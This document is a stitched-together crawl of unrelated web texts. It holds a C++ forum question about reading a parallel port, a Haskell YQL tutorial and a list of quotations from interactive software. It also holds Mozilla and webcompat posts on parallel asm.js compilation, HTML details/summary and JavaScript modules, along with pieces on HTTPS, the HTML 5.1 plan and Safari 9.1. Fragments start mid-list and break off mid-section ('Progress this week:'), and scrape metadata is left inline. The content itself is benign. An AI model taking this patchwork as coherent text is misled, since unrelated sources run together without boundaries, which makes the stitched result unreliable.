2. I learned all I know from c++ for dummies and the VC++ help file. And I didn't say I learned it well. (I am going through the tutorials here as of today.)
What I have to work with:
1. Visual C++ 2005 express edition. Not Visual studio - perhaps this is part of the problem?
2. Windows XP Professional Version 2002 Service pack 3.
3. A borrowed computer with an internet connection. (above xp computer has no internet)
4. unmedicated self taught programmer
5. abundant but limited supply of caffeine.
What I want to do:
I want to test the port LPT1 like this,
******************

Code:
test all pins
display the results.
save the results.
zero all outputs
retest inputs
compare result to saved results
loop
test input
make decisions based on result
send output to individual pins
break loop
free up everything
exit
drink something good
return (to bed)
so, I started a windows forms project named io.
In the project properties, under Linker, Input, Additional Dependencies, I added inpout.lib.
I have included:

Code:
#include "stdafx.h"
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "Form1.h"

using namespace io;
using namespace std;

in the main io.cpp file.
and here are my protos:

Code:
short _stdcall Inp32(short PortAddress);
void _stdcall Out32(short PortAddress, short data);

and here is the first tiny bit of code that I put in just before the errors started:

Code:
int reg;
reg = Inp32(378);
The Yahoo! Query Language is an expressive SQL-like language that lets you query, filter, and join data across Web services. With YQL, apps run faster with fewer lines of code and a smaller network footprint.
It provides a standard interface to a whole host of web services and, more importantly, it's extensible to support other data sources. The Data Tables web site contains more information about how to expose your data via YQL.
I'm still trying to learn Haskell so I thought I'd try to knock together a quick program to see how you'd make a basic query and process the results using Haskell. To make a web service call, I'll use Haskell Http and process the results using Text.JSON. Both of these are available to install using cabal.
To make a YQL query we need to point at the right URL, select the output format and URL-encode the query text. I've fixed the output format as JSON as it's more lightweight.
yqlurl :: String
yqlurl = ""
json :: String
json = "&format=json"
yqlRequest :: String -> IO (Result JSValue)
yqlRequest query = do
rsp <- simpleHTTP (getRequest (yqlurl ++ urlEncode query ++ json))
body <- (getResponseBody rsp)
return (decodeStrict body :: Result JSValue)
So now we have something we can play with in the interpreter and make queries with. The really nice property of YQL is being able to do joins with sub-selects. This helps avoid doing round-trips to the server and means less boilerplate code to join items together. For example, let's say we want to find the URLs of Haskell images from Flickr.
*Main> yqlRequest "desc flickr.photos.search"
-- Returns a description of how to search photos in flickr
*Main> yqlRequest "select * from flickr.photos.search where text=\"haskell\""
-- Find images where the text is Haskell
*Main> yqlRequest "select urls from flickr.photos.info where
photo_id in (select id from flickr.photos.search where text=\"haskell\")"
-- Find the URLs for images
That gives us raw JSON back, the next step is to process this into something relevant. The following YQL selects upcoming events in Cambridge.
select description from upcoming.events where woeid in
(select woeid from geo.places where text="Cambridge, UK")
woeid provides a way of getting the latitude and longitude of any place on earth. This is consistently used in the APIs so you can feed it in as a sub select. Very neat!
The goal of this strange task is simply to get a list of strings of the descriptions of events coming up in Cambridge. Firstly I defined a couple of helper functions. These feel really clumsy, so I'm 99% sure that there is a better way to do it, but I can't see it.
getField :: [String] -> JSValue -> JSValue
getField (x:xs) (JSObject j) = getField xs (fromJust (get_field j x))
getField [] j = j
toString :: JSValue -> String
toString (JSString x) = fromJSString x
So now all we need to do is hook in a couple of functions to drill down into the JSON, yank the description out, and bundle it into a list.
eventsInCambridge :: String
eventsInCambridge = "Select description from upcoming.events where
woeid in (select woeid from geo.places where text=\"Cambridge, UK\")"
getEventList = do
response <- yqlRequest eventsInCambridge
return (case response of
Ok value -> (processEvents (getField ["query","results","event"] value))
Error msg -> undefined)
processEvents :: JSValue -> [String]
processEvents (JSArray events) = map (toString .(getField ["description"])) events
And the output from this is a giant list of descriptions of the upcoming events in Cambridge. You can see the example data by clicking here. | http://www.fatvat.co.uk/2009/11/haskell-yql-and-bit-of-json.html | CC-MAIN-2022-27 | refinedweb | 590 | 70.73 |
This method removes a node specified by name. When this map contains the attributes attached to an element, if the removed attribute is known to have a default value, the attribute immediately appears containing the default value as well as the corresponding namespace URI, local name, and prefix when applicable.
Node removeNamedItem(String sname) throws DOMException
Parameters:
sname - The nodeName of the node to remove.
Throws:
NOT_FOUND_ERR: This error is raised if there is no node named name in this map.
NO_MODIFICATION_ALLOWED_ERR: This error is raised if this map is readonly.
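A minimal sketch of the method's behaviour (the element and attribute names below are made up for illustration):

```java
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;

public class RemoveNamedItemDemo {
    // Builds <book lang="en" id="b1"/>, removes the named attribute from
    // the element's NamedNodeMap, and returns the removed node's value.
    public static String removeAttr(String name) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                                             .newDocumentBuilder()
                                             .newDocument();
        Element book = doc.createElement("book");
        book.setAttribute("lang", "en");
        book.setAttribute("id", "b1");
        doc.appendChild(book);

        NamedNodeMap attrs = book.getAttributes();
        Node removed = attrs.removeNamedItem(name); // NOT_FOUND_ERR if absent
        return removed.getNodeValue();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(removeAttr("lang")); // prints: en
    }
}
```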
For further details, the user is requested to refer to the W3C DOM specification.
#include <iomanip>
#include <cmath>
#include <fstream>
#include <iostream>
#include <string>

using namespace std;

int main()
{
    int num1 = 0;
    int num2 = 0;
    char again = 'y';

    while (again == 'y')
    {
        cout << "Please enter two numbers to compare " << endl;
        cin >> num1 >> num2;
        cout << "The two numbers entered in order were " << num1 << " and " << num2 << endl;

        if (num1 < num2)
        {
            cout << num2 << " is the larger of " << num1 << " and " << num2 << endl;
        }
        else if (num1 > num2)
        {
            cout << num1 << " is the larger of " << num1 << " and " << num2 << endl;
        }

        cout << "\n Go again?(y/n): ";
        cin >> again;
    }
    return 0;
}
Good day. My assignment is as follows: Write a c++ program using functions, that will accept 2 numbers from the keyboard and then determine which is
the larger and smaller of the two. There should be two functions:
1. getnumbers
Output within the 1st function should display
The two numbers entered in order were XXX and YYY
2. findbig
Output within the 2nd function should display
XXX is the larger of XXX and YYY
Put the main function within an "again" loop that will continue until the user no longer wants to.(skip a line between each sets output).
Could you please explain to me how I'd go about creating two such functions? I had a bit of a problem grasping the concept of functions... thanks. The above program does work, but it doesn't have the two distinct functions as requested.
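One possible way to split the program above into the two required functions. This is only a sketch, not an official solution; the stream parameter on getnumbers is an extra assumption, added so the input step can be exercised without a keyboard:

```cpp
#include <iostream>

// getnumbers: reads two numbers from the given stream and echoes them
// in the order they were entered.
void getnumbers(std::istream& in, int& num1, int& num2) {
    std::cout << "Please enter two numbers to compare" << std::endl;
    in >> num1 >> num2;
    std::cout << "The two numbers entered in order were "
              << num1 << " and " << num2 << std::endl;
}

// findbig: returns the larger of the two numbers; main() can then print
// "XXX is the larger of XXX and YYY" inside the again-loop.
int findbig(int num1, int num2) {
    return (num1 > num2) ? num1 : num2;
}
```

main() would then just call getnumbers followed by findbig inside the same while (again == 'y') loop as the original program.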
Question:
I am trying an example from Bjarne Stroustrup's C++ book, third edition. While implementing a rather simple function, I get the following compile time error:
error: ISO C++ forbids comparison between pointer and integer
What could be causing this? Here is the code. The error is in the
if line:
#include <iostream>
#include <string>
using namespace std;

bool accept() {
    cout << "Do you want to proceed (y or n)?\n";
    char answer;
    cin >> answer;
    if (answer == "y") return true;
    return false;
}
Thanks!
Solution:1
You have two ways to fix this. The preferred way is to use:
string answer;
(instead of
char). The other possible way to fix it is:
if (answer == 'y') ...
(note single quotes instead of double, representing a
char constant).
Solution:2
A string literal is delimited by quotation marks and has type const char[] (an array that decays to a char pointer), not char.
Example:
"hello"
So when you compare a char to a char* you will get that same compiling error.
char c = 'c';
char *p = "hello";
if (c == p) // compiling error
{
}
To fix use a char literal which is delimited by single quotes.
Example:
'c'
Solution:3
You need to change those double quotation marks into single quotes, i.e.

if (answer == 'y') return true;
Here is some info on String Literals in C++:
Solution:4
"y" is a string/array/pointer. 'y' is a char/integral type
Solution:5
You must remember to use single quotes for char constants. So use
if (answer == 'y') return true;
Rather than
if (answer == "y") return true;
I tested this and it works
<figure>
Psst… Jeremy! Right now you’re getting notified every time something is posted to Slack. That’s great at first, but now that activity is increasing you’ll probably prefer dialing that down.
<figcaption> —Slackbot, 2015 </figcaption> </figure>
<figure>
What’s happening?
<figcaption> —Twitter, 2009 </figcaption> </figure>
<figure>
Why does everyone always look at me? I know I’m a chalkboard and that’s my job, I just wish people would ask before staring at me. Sometimes I don’t have anything to say.
<figcaption> —Existentialist chalkboard, 2007 </figcaption> </figure>
<figure>.
<figcaption> —Little MOO, 2006 </figcaption> </figure>
<figure>
It looks like you’re writing a letter.
<figcaption> —Clippy, 1997 </figcaption> </figure>
<figure>.
<figcaption> —The Warlock Of Firetop Mountain, 1982 </figcaption> </figure>
<figure>
Welcome to Adventure!! Would you like instructions?
<figcaption> —Colossal Cave, 1976 </figcaption> </figure>
<figure>
I am a lead pencil—the ordinary wooden pencil familiar to all boys and girls and adults who can read and write.
<figcaption> —I, Pencil, 1958 </figcaption> </figure>
<figure>
ÆLFRED MECH HET GEWYRCAN
Ælfred ordered me to be made
<figcaption>
—The Ælfred Jewel, ~880
</figcaption>
</figure>.
In December 2015, I worked on reducing the startup time of asm.js programs in Firefox by making compilation more parallel. As our JavaScript engine, SpiderMonkey, uses the same compilation pipeline for both asm.js and WebAssembly, this also benefited WebAssembly compilation. Now is a good time to talk about what that meant, how it was achieved, and what the next ideas are for making it even faster.
Parallelization consists of splitting a sequential program into smaller
independent tasks, then having them run on different CPU. If your program
is using
N cores, it can be up to
N times faster.
Well, in theory. Let's say you're in a car, driving on a 100 Km long road. You've already driven the first 50 Km in one hour. Let's say your car can have unlimited speed from now on. What is the maximal average speed you can reach, once you get to the end of the road?
People intuitively answer "If it can go as fast as I want, so nearby lightspeed
sounds plausible". But this is not true! In fact, if you could teleport from
your current position to the end of the road, you'd have traveled 100 Km in one
hour, so your maximal theoritical speed is 100 Km per hour. This result is a
consequence of Amdahl's law.
When we get back to our initial problem, this means you can expect a
N times
speedup if you're running your program with
N cores if, and only if your
program can be entirely run in parallel. This is usually not the case, and
that is why most wording refers to speedups up to N times faster, when it
comes to parallelization.
Now, say your program is already running some portions in parallel. To make it faster, one can identify some parts of the program that are sequential, and make them independent so that you can run them in parallel. With respect to our car metaphor, this means augmenting the portion of the road on which you can run at unlimited speed.
This is exactly what we have done with parallel compilation of asm.js programs under Firefox.
I recommend to read this blog post. It clearly explains the differences between JIT (Just In Time) and AOT (Ahead Of Time) compilation, and elaborates on the different parts of the engines involved in the compilation pipeline.
As a TL;DR, keep in mind that asm.js is a strictly validated, highly optimizable, typed subset of JavaScript. Once validated, it guarantees high performance and stability (no garbage collector involved!). That is ensured by mapping every single JavaScript instruction of this subset to a few CPU instructions, if not only a single instruction. This means an asm.js program needs to get compiled to machine code, that is, translated from JavaScript to the language your CPU directly manipulates (like what GCC would do for a C++ program). If you haven't heard, the results are impressive and you can run video games directly in your browser, without needing to install anything. No plugins. Nothing more than your usual, everyday browser.
Because asm.js programs can be gigantic in size (in number of functions as well as in number of lines of code), the first compilation of the entire program is going to take some time. Afterwards, Firefox uses a caching mechanism that prevents the need for recompilation and almost instaneously loads the code, so subsequent loadings matter less*. The end user will mostly wait for the first compilation, thus this one needs to be fast.
Before the work explained below, the pipeline for compiling a single function (out of an asm.js module) would look like this:
So far, only the MIR optimization passes, register allocation and LIR generation were done in parallel. Wouldn't it be nice to be able to do more?
* There are conditions for benefitting from the caching mechanism. In particular, the script should be loaded asynchronously and it should be of a consequent size.
Our goal is to make more work in parallel: so can we take out MIR generation from the main thread? And we can take out code generation as well?
The answer happens to be yes to both questions.
For the former, instead of emitting a MIR graph as we parse the function's body, we emit a small, compact, pre-order representation of the function's body..
Now, instead of parsing and generating MIR in a single pass, we would now parse and generate wasm IR in one pass, and generate the MIR out of the wasm IR in another pass. The wasm IR is very compact and much cheaper to generate than a full MIR graph, because generating a MIR graph needs some algorithmic work, including the creation of Phi nodes (join values after any form of branching). As a result, it is expected that compilation time won't suffer. This was a large refactoring: taking every single asm.js instructions, and encoding them in a compact way and later decode these into the equivalent MIR nodes.
For the second part, could we generate code on other threads? One structure in
the code base, the MacroAssembler, is used to generate all the code and it
contains all necessary metadata about offsets. By adding more metadata there to
abstract internal calls **, we can describe the new scheme in terms of a
classic functional
map/
reduce:
a map operation, transforming an array of wasm IR into an array of MacroAssemblers.
a reduce operation, merging each MacroAssembler into the module's single one.
At the end of the compilation of the entire module, there is still some light work to be done: offsets of internal calls need to be translated to their actual locations. All this work has been done in this bugzilla bug.
* In fact, at the time when this was being done, we used a different superset of wasm. Since then, work has been done so that our asm.js frontend is really just another wasm emitter.
** referencing functions by their appearance order index in the module, rather than an offset to the actual start of the function. This order is indeed stable, from a function to the other.
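Very loosely, the scheme can be sketched like this. This is a toy model, not SpiderMonkey code: "functions" are strings, "compiling" is a fake transform, and the offsets recorded during the reduce step stand in for the call-site patching done on the real MacroAssembler:

```cpp
#include <cstddef>
#include <string>
#include <thread>
#include <vector>

// Fake per-function compilation: runs independently, so it can be mapped
// onto any helper thread.
static std::string compileOne(const std::string& src) {
    return "code(" + src + ")";
}

struct Module {
    std::string code;                 // merged "machine code"
    std::vector<std::size_t> offsets; // start of each function in `code`
};

static Module compileModule(const std::vector<std::string>& funcs) {
    std::vector<std::string> compiled(funcs.size());

    // Map: one thread per function (a real engine would use a thread pool).
    std::vector<std::thread> workers;
    for (std::size_t i = 0; i < funcs.size(); ++i)
        workers.emplace_back([&, i] { compiled[i] = compileOne(funcs[i]); });
    for (auto& w : workers) w.join();

    // Reduce: merge sequentially; the order is stable, so function indices
    // used during the map phase can now be resolved to concrete offsets.
    Module m;
    for (const auto& c : compiled) {
        m.offsets.push_back(m.code.size());
        m.code += c;
    }
    return m;
}
```

The important property mirrored here is that the map phase never needs the final layout: functions refer to each other by index, and only the cheap reduce step turns indices into offsets.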
Benchmarking has been done on a Linux x64 machine with 8 cores clocked at 4.2 Ghz.
First, compilation times of a few asm.js massive games:
The X scale is the compilation time in seconds, so lower is better. Each value point is the best one of three runs. For the new scheme, the corresponding relative speedup (in percentage) has been added:
For all games, compilation is much faster with the new parallelization scheme.
Now, let's go a bit deeper. The Linux CLI tool
perf has a
stat command
that gives you an average of the number of utilized CPUs during the program
execution. This is a great measure of threading efficiency: the more a CPU is
utilized, the more it is not idle, waiting for other results to come, and thus
useful. For a constant task execution time, the more utilized CPUs, the more
likely the program will execute quickly.
The X scale is the number of utilized CPUs, according to the
perf stat
command, so higher is better. Again, each value point is the best one of three
runs.
With the older scheme, the number of utilized CPUs quickly rises up from 1 to 4 cores, then more slowly from 5 cores and beyond. Intuitively, this means that with 8 cores, we almost reached the theoritical limit of the portion of the program that can be made parallel (not considering the overhead introduced by parallelization or altering the scheme).
But with the newer scheme, we get much more CPU usage even after 6 cores! Then it slows down a bit, although it is still more significant than the slow rise of the older scheme. So it is likely that with even more threads, we could have even better speedups than the one mentioned beforehand. In fact, we have moved the theoritical limit mentioned above a bit further: we have expanded the portion of the program that can be made parallel. Or to keep on using the initial car/road metaphor, we've shortened the constant speed portion of the road to the benefit of the unlimited speed portion of the road, resulting in a shorter trip overall.
Despite these improvements, compilation time can still be a pain, especially on mobile. This is mostly due to the fact that we're running a whole multi-million-line codebase through the backend of a compiler to generate optimized code. Following this work, the next bottleneck during the compilation process is parsing, which matters for asm.js in particular, whose source is plain text. Decoding WebAssembly is an order of magnitude faster though, and it can be made even faster. Moreover, we have even more load-time optimizations coming down the pipeline!
In the meanwhile, we keep on improving the WebAssembly backend. Keep track of our progress on bug 1188259!
Once.
Also presented by Pomax was an HTML5 multiplayer Mahjong game. It allows four players to play the classic Chinese game online by using socket.io and a Node.js server to connect the players. The frontend is built using React and Webpack.
On the dev-platform mailing-list, Ting-Yu Lin has sent an Intent to Ship: HTML5
<details> and
<summary> tags. So what about it?
HTML 5.1 specification describes
details as:
The details element represents a disclosure widget from which the user can obtain additional information or controls.
which is not that clear; luckily, the specification has some examples. I put one on codepen (you need Firefox Nightly at this time, or Chrome/Opera or Safari dev edition, to see it). At least the rendering seems to be pretty much the same.
But as usual, evil is in the
details (pun not intended at first). If a developer wants to hide the triangle, the possibilities are for now not interoperable. Think possible Web compatibility issues here. I created another codepen for testing the different scenarios.
In Blink/WebKit world:
summary::-webkit-details-marker { display: none; }
In Gecko world:
summary::-moz-list-bullet { list-style-type: none; }
or
summary { display: block; }
These work, though the summary
{ display: block; } one is a recipe for catastrophe.
Then on the thread there was the proposal of
summary { list-style-type: none; }
which does indeed hide the arrow in Gecko, but doesn't do anything whatsoever in Blink and WebKit. So it's not really a reliable solution from a Web compatibility point of view.
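Until the engines converge, a site that wants to hide the marker everywhere has to stack the vendor-specific rules side by side. A minimal sketch combining the selectors discussed above:

```css
/* Blink/WebKit */
summary::-webkit-details-marker { display: none; }
/* Gecko */
summary::-moz-list-bullet { list-style-type: none; }
```

Each engine ignores the selector it doesn't recognize, so the two rules can coexist safely.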
Then usually I like to look at what people do on GitHub for their projects. So these are a collection of things on the usage of
-webkit-details-marker:
details summary::-webkit-details-marker { display: none; }
/* to change the pointer on hover */
details summary { cursor: pointer; }
/* to style the arrow widget on opening and closing */
details[open] summary::-webkit-details-marker { color: #00F; background: #0FF; }
/* to replace the marker with an image */
details summary::-webkit-details-marker:after { content: icon('file.png'); }
/* using content this time for a unicode character */
summary::-webkit-details-marker { display: none; }
details summary::before { content: "►"; }
details[open] summary::before { content: "▼"; }
On JavaScript side, it seems there is a popular shim used by a lot of people: details.js
Otsukare!
One thing we’ve been meaning to do more of is tell our blog readers more about new features we’ve been working on across WHATWG standards. We have quite a backlog of exciting things that have happened, and I’ve been nominated to start off by telling you the story of
<script type="module">.
JavaScript modules have a long history. They were originally slated to be finalized in early 2015 (as part of the “ES2015” revision of the JavaScript specification), but as the deadline drew closer, it became clear that although the syntax was ready, the semantics of how modules load each other were still up in the air. This is a hard problem anyway, as it involves extensive integration between the JavaScript engine and its “host environment”—which could be either a web browser, or something else, like Node.js.
The compromise that was reached was to have the JavaScript specification specify the syntax of modules, but without any way to actually run them. The host environment, via a hook called HostResolveImportedModule, would be responsible for resolving module specifiers (the
"x" in
import x from "x") into module instances, by executing the modules and fetching their dependencies. And so a year went by with JavaScript modules not being truly implementable in web browsers, as while their syntax was specified, their semantics were not yet.
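To make the hook's role concrete, here is a toy sketch (not the real spec algorithm) of a host-side module map in the spirit of HostResolveImportedModule: specifiers resolve to a single cached module record, so the same specifier always yields the same instance. All names here are illustrative:

```javascript
// A hypothetical host environment's module map.
const moduleMap = new Map();

// Register a module under a specifier; `factory` stands in for
// fetching, parsing, and instantiating the module source.
function defineModule(specifier, factory) {
  moduleMap.set(specifier, { factory, instance: undefined, evaluated: false });
}

// The host hook: resolve a specifier to a module instance,
// evaluating the module at most once and caching the result.
function resolveImportedModule(specifier) {
  const record = moduleMap.get(specifier);
  if (!record) throw new Error(`Cannot resolve module "${specifier}"`);
  if (!record.evaluated) {
    record.instance = record.factory();
    record.evaluated = true;
  }
  return record.instance;
}

// `import x from "x"` conceptually boils down to something like:
defineModule("x", () => ({ default: 42 }));
const x = resolveImportedModule("x").default; // 42
```

The key property the spec work had to pin down is exactly this kind of idempotence: resolving "x" twice must hand back the same module instance, not re-execute it.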
In the epic whatwg/html#433 pull request, we worked on specifying these missing semantics. This involved a lot of deep changes to the script execution pipeline, to better integrate with the modern JavaScript spec. The WHATWG community had to discuss subtle issues like how cross-origin module scripts were fetched, or how/whether the
async,
defer, and
charset attributes applied. The end result can be seen in a number of places in the HTML Standard, most notably in the definition of the
script element and the scripting processing model sections. At the request of the Edge team, we also added support for worker modules, which you can see in the section on creating workers. (This soon made it over to the service workers spec as well!) To wrap things up, we included some examples: a couple for
<script type="module">, and one for module workers.
Of course, specifying a feature is not the end; it also needs to be implemented! Right now there is active implementation work happening in all four major rendering engines, which (for the open source engines) you can follow in these bugs:
And there's more work to do on the spec side, too! There's ongoing discussion of how to add more advanced dynamic module-loading APIs, from something simple like a promise-returning
self.importModule, all the way up to the experimental ideas being prototyped in the whatwg/loader repository.
We hope you find the addition of JavaScript modules to the HTML Standard as exciting as we do. And we'll be back to tell you more about other recent important changes to the world of WHATWG standards soon!
Daruma is a little doll on which you draw one eye with a wish in mind, and finally draw the second eye once the wish has been realized. This week Tokyo Metro and Yahoo! Japan fixed their markup. Tune of the week: Pretty Eyed Baby - Eri Chiemi.
Progress this week:
Today: 2016-04-11T07:29:54.738014 368 open issues ---------------------- needsinfo 3 needsdiagnosis 124 needscontact 32 contactready 94 sitewait 116 ----------------------
You are welcome to participate
The feed of otsukare (this blog) doesn't have an
updated element. That was bothering me too. There was an open issue about it on the Pelican issues tracker. Let's propose a pull request. It was accepted after a couple of rounds of back and forth.
We had a team meeting this week.
Understanding Web compatibility is hard. It doesn't mean the same exact thing for everyone. We probably need to better define for others what it means. Maybe the success stories, with their concrete examples, could help delineate the perimeter of what a Web Compat issue is.
Looking at who is opening issues on WebCompat.com I was pleasantly surprised by the results.
(a selection of some of the bugs worked on this week).
perspective to an arbitrary
0.0001px. I added the results to the issue. I contacted the Web site owners where we found the issue. Also, funny details of implementation in Gecko: another codepen.
transform: perspective(0.00000000000000000000000000000000001px) translate(260px, 0); is considered not zero.
transform: perspective(0.000000000000000000000000000000000001px) translate(260px, 0); is considered something else, but not sure what.
s/Apple/Market Share Gorilla/. Currently there are very similar things happening in some ways for Chrome on the Desktop market. The other way around, aka implementing fancy APIs that Web developers rush to use on their sites and create Web Compatibility issues. The issue is not that much about being late at implementing, or being early at implementing. The real issue is the market share dominance, which warps the way people think about the technology and in the end makes it difficult for other players to even exist in the market. I have seen that for Opera on Desktop, and I have seen that for Firefox on Mobile. And bear with me, it was Microsoft (Desktop) in the past, it is Google (Desktop) and Apple (Mobile) now, and it will be another company in the future, the one dominating the market share.
width <object> for Firefox only.
Otsukare!
In part 4, we looked at hardening default configurations and avoiding known vulnerabilities, but what other advantages are there to having our sites run HTTPS?
First, a recap of what we get by using HTTPS:
*unless the users’ computers are infected with a virus or some kind of browser malware that modifies pages after the browser has decrypted them, or modifies the content before sending it back to the network via the browser. Remember I said that security is not 100% guaranteed? Sorry to scare you. You’re welcome
So that’s cool, but there’s even more!
Most of the newest platform features are only available if served via HTTPS, and some existing features, such as GeoLocation or AppCache, will only work if served under HTTPS too. For example:
While this is ‘annoying’.
The core goals for future HTML specifications are to match reality better, to make the specification as clear as possible to readers, and of course to make it possible for all stakeholders to propose improvements, and understand what makes changes to HTML successful.
The plan is to ship an HTML5.1 Recommendation in September 2016. This means we will need to have a Candidate Recommendation by the middle of June, following a Call For Consensus based on the most recent Working Draft.
To make it easier for people to review changes, an updated Working Draft will be published approximately once a month. For convenience, changes are noted within the specification itself.
Longer term we would like to “rinse and repeat”, making regular incremental updates to HTML a reality that is relatively straightforward to implement. In the meantime you can track progress using Github pulse, or by following @HTML_commits or @HTMLWG on Twitter.
The specification is on Github, so anyone who can make a Pull Request can propose changes. For simple changes such as grammar fixes, this is a very easy process to learn – and simple changes will generally be accepted by the editors with no fuss.
If you find something in the specification that generally doesn’t work in shipping browsers, please file an issue, or better still file a Pull Request to fix it. We will generally remove things that don’t have adequate support in at least two shipping browser engines, even if they are useful to have and we hope they will achieve sufficient support in the future: in some cases, you or we may propose the dropped feature as a future extension – see below regarding “incubation”.
HTML is a very large specification. It is developed from a set of source files, which are processed with the Bikeshed
preprocessor. This automates things like links between the various sections, such as to element definitions. Significant
changes, even editorial ones, are likely to require a basic knowledge of how Bikeshed works, and we will continue to improve the
documentation especially for beginners.
HTML is covered by the W3C Patent Policy, so many potential patent holders have already ensured that it can be implemented without paying them any license fee. To keep this royalty-free licensing, any “substantive change” – one that actually changes conformance – must be accompanied by the patent commitment that has already been made by all participants in the Web Platform Working Group. If you make a Pull Request, this will automatically be checked, and the editors, chairs, or W3C staff will contact you to arrange the details. Generally this is a fairly simple process.
For substantial new features we prefer a separate module to be developed, “incubated”, to ensure that there is real support from the various kinds of implementers including browsers, authoring tools, producers of real content, and users, and when it is ready for standardisation to be proposed as an extension specification for HTML. The Web Platform Incubator Community Group (WICG) was set up for this purpose, but of course when you develop a proposal, any venue is reasonable. Again, we ask that you track technical contributions to the proposal (WICG will help do this for you), so we know when it arrives that people who had a hand in it have also committed to W3C’s royalty-free patent licensing and developers can happily implement it without a lot of worry about whether they will later be hit with a patent lawsuit.
W3C’s process for developing Recommendations requires a Working Group to convince the W3C Director, Tim Berners-Lee, that the specification
“is sufficiently clear, complete, and relevant to market needs, to ensure that independent interoperable implementations of each feature of the specification will be realized”
This had to be done for HTML 5.0. When a change is proposed to HTML we expect it to have enough tests to demonstrate that it does improve interoperability. Ideally these fit into an automatable testing system like the “Webapps test harness“. But in practice we plan to accept tests that demonstrate the necessary interoperability, whether they are readily automated or not.
The benefit of this approach is that except where features are removed from browsers, which is comparatively rare, we will have a consistently increasing level of interoperability as we accept changes, meaning that at any time a snapshot of the Editors’ draft should be a stable basis for an improved version of HTML that can be published as an updated version of an HTML Recommendation.
We want HTML to be a specification that authors and implementors can use with ease and confidence. The goal isn’t perfection (which is after all the enemy of good), but rather to make HTML 5.1 better than HTML 5.0 – the best HTML specification until we produce HTML 5.2…
And we want you to feel welcome to participate in improving HTML, for your own purposes and for the good of the Web.
Chaals, Léonie, Ade – chairs
Alex, Arron, Steve, Travis – editors
The..
Last week, a new version of Safari shipped with the release of iOS 9.3 and OS X El Capitan 10.11.4. Safari on iOS 9.3 and Safari 9.1 on OS X are significant releases that incorporate a lot of exciting web features from WebKit. These are web features that were considered ready to go, and we simply couldn’t wait to share them with users and developers alike.
On top of new web features, this release improves the way people experience the web with more responsiveness on iOS, new gestures on OS X, and safer JavaScript dialogs. Developers will appreciate the extra polish, performance and new tools available in Web Inspector.
Here is a brief review of what makes this release so significant.
The
<picture> element is a container that is used to group different
<source> versions of the same image. It offers a fallback approach so the browser can choose the right image depending on device capabilities, like pixel density and screen size. This comes in handy for using new image formats with built-in graceful degradation to well-supported image formats. The ability to specify media queries in the
media attribute on the
<source> elements brings art direction of images to responsive web design.
For more on the
<picture> element, take a look at the HTML 5.1 spec.
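As a quick illustration of the art-direction use case (file names here are hypothetical), a <picture> that swaps sources by viewport width and image format, falling back to a plain <img>:

```html
<picture>
  <!-- Wide crop for large screens, preferring WebP when supported -->
  <source srcset="hero-wide.webp" media="(min-width: 800px)" type="image/webp">
  <source srcset="hero-wide.jpg" media="(min-width: 800px)">
  <!-- Fallback, also used on narrow screens -->
  <img src="hero-narrow.jpg" alt="A description of the image">
</picture>
```

Browsers that don't understand <picture> simply render the inner <img>, which is what gives the element its built-in graceful degradation.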
CSS variables, known formally as CSS Custom Properties, let developers reduce code duplication, code complexity and make maintenance of CSS much easier. Recently we talked about how Web Inspector took advantage of CSS variables, to reduce code duplication and shed many CSS rules.
You can read more about CSS Variables in WebKit.
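A minimal sketch of the duplication-reducing pattern (property name and values are illustrative): declare a custom property once, then reference it with var() wherever the value is needed.

```css
:root {
  --accent-color: #326891;
}
a { color: var(--accent-color); }
button { border-color: var(--accent-color); }
```

Changing the accent now means editing one declaration instead of hunting down every rule that repeats the color.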
CSS font features allow you to use special text styles and effects available in fonts like ligatures and small caps. These aren’t faux representations manufactured by the browser, but the intended styles designed by the font author.
For more information, read the CSS Font Features blog post.
The CSS
will-change property lets you tell the browser ahead of time about changes that are likely to happen on an element. The hint gives browsers a heads-up so that they can make engine optimizations to deliver smooth performance.
Read more about
will-change in the CSS Will Change Module Level 1 spec.
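For example, a sketch of hinting the engine that an element's transform is about to animate (selector and timing are illustrative):

```css
.slide-in {
  /* Tell the engine ahead of time which property will change,
     so it can prepare (e.g. promote the element to its own layer). */
  will-change: transform;
  transition: transform 0.3s ease-out;
}
```

As the spec cautions, the hint should be applied sparingly to elements that really will change, since the optimizations it triggers have their own memory cost.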
Already available in WebKit for iOS, gesture events are supported on OS X with Safari 9.1. Gesture events are used to detect pinching and rotation on trackpads.
See the GestureEvent Class Reference for more details.
WebKit for iOS has a 350 millisecond delay to allow detecting double-tapping to zoom content that appears too small on mobile devices. With the release of Safari 9.1, WebKit on iOS removes the delay for web content that is designed for the mobile viewport size.
Read about More Responsive Tapping on iOS for details on how to ensure web pages can get this fast-tap behavior.
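According to the linked post, the fast-tap behavior applies to content designed for the mobile viewport size; the usual way to declare that is the viewport meta tag:

```html
<meta name="viewport" content="width=device-width, initial-scale=1">
```

Pages sized this way no longer need double-tap-to-zoom, so WebKit can dispatch taps without the 350 ms wait.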
To protect users from bad actors using JavaScript dialogs in unscrupulous ways, the dialogs in Safari 9.1 were redesigned to look and work more like web content. The new behavior means that dialogs no longer prevent a user from navigating away or closing the page. Instead users can more clearly understand the dialogs come from the web page they are viewing and easily dismiss them.
For more details, see the Displaying Dialogs section from What’s New in Safari.
Web developers will enjoy several new noteworthy enhancements to debugging and styling with Web Inspector. Faster performance in timelines means debugging complex pages and web apps is easier than ever. The new Watch Expressions section in the Scope Chain sidebar helps a developer to see the data flowing through the JavaScript environment.
In the Elements tab, pseudo-elements such as
::before and
::after are accessible from the DOM tree to make it straightforward to inspect and style them.
Web Inspector also added a Visual Styles sidebar that adds visual tools for modifying webpage styles without requiring memorization of all of the properties and elements of CSS. It makes styling a web page more accessible to designers and developers alike, allowing them to get involved in exploring different styles.
Learn more about how it works in Editing CSS with the Visual Styles Sidebar.
That is a lot of enhancements and refinements for a dot-release. Along with OS X El Capitan, Safari 9.1 is also available on OS X Yosemite and OS X Mavericks — bringing all of these improvements to even more users. We’d love to hear about your favorite new feature. Please send your tweets to @webkit or @jonathandavis and let us know!
News of this week were quite disheartening. Young individuals with dreams of violence and blood. Politicians with words of hate. The Web compatibility bugs seem to be a gentle stroke. Tune of the week: Mad World - Gary Jules.
Finally managed to get the to-be-triaged bugs down to a couple. We need to get better as a community at filtering the incoming bugs. There are right now 2 remaining old issues.
Progress this week:
